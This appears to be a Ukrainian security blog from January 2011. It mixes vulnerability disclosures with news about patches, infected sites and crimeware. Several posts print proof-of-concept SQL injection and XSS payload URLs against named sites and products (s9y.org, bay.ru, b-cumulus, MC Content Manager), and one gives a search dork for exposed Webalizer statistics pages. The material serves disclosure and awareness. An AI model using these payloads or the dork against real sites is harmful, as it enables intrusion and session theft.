15:03 18.01.2011
03.06.2010
У жовтні, 30.10.2009, я знайшов SQL Injection уразливість на сайті http://s9y.org. Про що найближчим часом сповіщу адміністрацію сайта.
Раніше я вже писав про уразливість на s9y.org.
Детальна інформація про уразливість з’явиться пізніше.
18.01.2011
SQL Injection:
http://s9y.org/index.php?node=-1′%20or%20version()%3E’5
Дана уразливість вже виправлена.
Опубліковано в Уразливості | Без Коментарів »
23:55 17.01.2011
Раніше я вже писав про уразливість у віджеті Flash Tag Cloud для Blogsa та інших ASP.NET движків. Така ж уразливість є і в b-cumulus (віджеті для Blogger, що також використовується на окремих сайтах), що використовує модифіковану версію tagcloud.swf розроблену автором WP-Cumulus. Про мільйони флешек tagcloud.swf вразливих до XSS атак я згадував у своїй статті XSS уразливості в 34 мільйонах флеш файлах.
Нещодавно, 15.01.2011, я знайшов Cross-Site Scripting уразливість в b-cumulus. Про що найближчим часом повідомлю розробнику.
XSS:
Використовуватися може файл tagcloud.swf або tagcloud-ru.swf.
http://site/path/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
http://site/path/tagcloud-ru.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
Код виконається при кліку. Це Strictly social XSS. Також можна провести HTML Injection атаку, подібно до WP-Cumulus.
Уразливі всі версії b-cumulus.
Опубліковано в Уразливості | Без Коментарів »
22:41 17.01.2011
В січні місяці Microsoft випустила 2 патчі. Що значно менше ніж у грудні.
У січневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло два бюлетені по безпеці. Що закривають три уразливості в програмних продуктах компанії. Зокрема один патч виправляє важливу уразливість, а інший патч - критичні уразливості, які дозволяють виконати довільний шкідливий код на віддаленому комп’ютері.
Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows XP, 2003, Vista, 2008, 7 та 2008 R2.
Опубліковано в Новини | Без Коментарів »
19:18 17.01.2011
Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.
- http://megatona.net - інфекція була виявлена 07.01.2011. Зараз сайт не входить до переліку підозрілих.
- http://worber.at.ua - інфекція була виявлена 29.11.2010. Зараз сайт не входить до переліку підозрілих.
- http://volans.com.ua - інфекція була виявлена 09.01.2011. Зараз сайт не входить до переліку підозрілих.
- http://j1c.pp.ua - інфекція була виявлена 05.11.2010. Зараз сайт не входить до переліку підозрілих.
- http://5backs.at.ua - інфекція була виявлена 08.12.2010. Зараз сайт не входить до переліку підозрілих.
Опубліковано в Новини сайту, Дослідження | Без Коментарів »
15:21 17.01.2011
28.05.2010
У жовтні, 24.10.2009, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на сайті http://www.bay.ru (інтернет магазин). Про що найближчим часом сповіщу адміністрацію сайта.
Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливість на vch.kiev.ua.
Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
17.01.2011
XSS:
http://www.bay.ru/search?query=%3Cimg%20src=''%20onerror=%22javascript:alert(document.cookie)%22%3E
http://www.bay.ru/search?min_price=%22%3E%3Cimg%20src=%22%22%20onerror=%22javascript:alert(document.cookie)%22%3E
http://www.bay.ru/search?max_price=%22%3E%3Cimg%20src=%22%22%20onerror=%22javascript:alert(document.cookie)%22%3E
Insufficient Anti-automation:
В формі реєстрації (https://www.bay.ru/customer/signup, що зараз змінила адресу на https://www.bay.ru/account/register) немає захисту від автоматизованих запитів (капчі).
Якщо XSS уразливості вже виправлені, то IAA уразливість досі не виправлена.
Опубліковано в Уразливості | Без Коментарів »
22:49 15.01.2011
В статті CrimeWare: новий виток противостояния розповідається про CrimeWare. Це фінансові шкідливі програми, тобто віруси, що призначені для викрадення фінансових даних користувачів.
Дана стаття присвячена аналізу ситуації, що склалася останнім часом в області атак шкідливих програм на клієнтів фінансових організацій. В ній описанна ситуація з протистоянням фінансових шкідливі програми як з антивірусною індустрєю, так і з фінансовим сектором. Піднямаються питання атак кіберкриміналу, технологічних можливостей антивірусної індустрії, захисту клієнтів фінансовими організаціями, пошуку ефективного рішення та державної підтримки.
Географія розподілу шкідливих хостингів, що займаються поширенням фінансових шкідливих програм достатньо широка. Серед 10 країн, на хостінгах яких найбільше розповсюджувалися фінансові віруси в першому кварталі 2010 року, є наступні: Бразилія, США, Китай, Росія, Німеччина, Франція, Іспанія, Великобританія, Південна Корея та Нідерланди.
Враховуючи дірявість e-commerce сайтів, включаючи сайти, що працюють з кредитними картами, в тому числі тих, що ховаються за секюріті логотипами, то дана тема є достатньо актуальною.
Опубліковано в Статті | Без Коментарів »
19:27 15.01.2011
Пропоную вашій увазі добірку цікавих новин на тему безпеки.
За повідомленням hackzona.com.ua, сайт Google піддався дефейсу.
Нещодавно бангладешський сайт Googlе піддався дефейсу. На минулому тижні хакер зумів захопити управління над доменом google.com.bd і тим самим продемонстрував дефейс відвідувачам цього ресурсу.
За повідомленням ain.ua, Нацбанк України вперше дозволив випустити електронні гроші.
Наприкінці листопада Національний Банк України затвердив правила системи електронних грошей MoneXy і “Максі”. Відповідні дозволи одержали банки-власники систем - “Контракт” і “VAB Банк”. Тепер вони зможуть здійснювати випуск електронних грошей та інші операції у своїх системах відповідно до вимог Положення про електронні гроші в Україні, затвердженими Правлінням Нацбанку України №178 від 25.06.2008.
Це перший випадок коли електронним платіжним системам (в даному випадку двом системам) надали офіційні дозволи на роботу в Україні. Але враховуючі дірявість сайта банку Контракт, як і проблеми з безпекою на сайтах самої системи MoneXy, то незважаючи на наявність офіційних дозволів, користувачам цих систем потрібно бути обережними.
За повідомленням hackzona.com.ua, зламати WiFi-пароль можна за допомогою Amazon Web Services.
Німецький фахівець з інформаційної безпеки розробив спеціальне програмне забезпечення, яке використовуючи обчислювальні ресурси хмарного сервісу Amazon може взламувати паролі бездротових WiFi-мереж.
Про використання хмарних технологій (в тому числі й від Amazon) для хакінгу я вже писав.
Опубліковано в Новини | Без Коментарів »
15:10 15.01.2011
05.11.2010
У липні, 07.07.2010, я знайшов Cross-Site Scripting, Brute Force та Full path disclosure уразливості в системі MC Content Manager (це українська комерційна CMS). Які я виявив на сайті www.br-ua.com та інших сайтах на даному движку. Про що найближчим часом повідомлю розробникам.
Раніше я вже писав про уразливості в MC Content Manager.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.
15.01.2011
XSS:
http://site/cms/’;alert(document.cookie);/*
Brute Force:
http://site/admin/
Full path disclosure:
http://site/cms/1/
http://site/ru/cms/1
http://site/en/cms/1
Уразливі потенційно всі версії MC Content Manager (MC Content Manager v.10.1.1 та попередні версії).
Опубліковано в Уразливості | Без Коментарів »
22:46 14.01.2011
Витоки інформації на сайтах трапляються часто, такі як витоки повного шляху (Full path disclosure), витоки паролів та інші випадки витоків важливої інформації. В даній статті (запланованої в 2009) я розповім про витоки інформації через статистику відвідувань.
Системи статистики відвідувань можуть бути з обмеженим доступом (по логіну і паролю), а можуть бути і відкриті. От останні й представляють загрозу і про них буде йти мова. Тому що до відкритих систем статистики можуть дістатися усі бажаючі, в тому числі й нападники, які використають статистичну інформацію для своїх цілей.
Серед популярних статистичних систем є така система як Webalizer. Яку часто розміщують на сайті в публічному доступі (не обмеживши до неї доступ лише адміністаторам сайта). Що призводить до витоків інформації про сайт - сам багато разів знаходив Webalizer на різних сайтах
. Зокрема раніше я писав про уразливості в XAMPP, серед яких є й стандартний і легковгадуємий шлях до Webalizer (доступ до якого не обмежений).
Використовуючи наступний дорк можна знайти сайти з незахищеним Webalizer, що були проіндексовані Гуглом:
intitle:”Usage Statistics for” - до 557000 сайтів. Серед них до 17100 державних сайтів, в тому числі до 2040 американських gov-сайтів.
Необмежений доступ до систем статистики відвідувань та витік інформації про неї може призвести до:
- Витоку реальних статистичних даних (які можуть не співпадати з офіційно декларуємими).
- Витоку даних про джерела трафіку.
- Витоку даних про структуру сайта, в тому числі про приховані ресурси (які також можуть бути не захищені паролем).
- В самих системах статистики відвідувань можуть бути уразливості.
- В самих прихованих ресурсах, інформація про які витікає через систему статистики відвідувань, можуть бути уразливості.
Тому варто обмежувати доступ до статистики відвібувань, щоб не допускати витоків інформації.
Опубліковано в Статті | Без Коментарів »
19:11 14.01.2011
Нещодавно, 06.01.2011, вийшли PHP 5.3.5 та 5.2.17. В яких виправлена одна критична уразливість. Даний реліз направлений на покращення стабільності та безпеки 5.2.x та 5.3.x гілок PHP.
В PHP 5.3.5 та 5.2.17 зроблене наступне секюріті виправлення:
- Виправлена DoS уразливість (баг #53632), що виникала при конвертаціїї з типу string в double та могла привести до підвисання систем, що використовують x87 FPU регістри. Дана проблема торкається тільки x86 32-бітних систем.
По матеріалам http://www.php.net.
Опубліковано в Новини, Програми | Без Коментарів »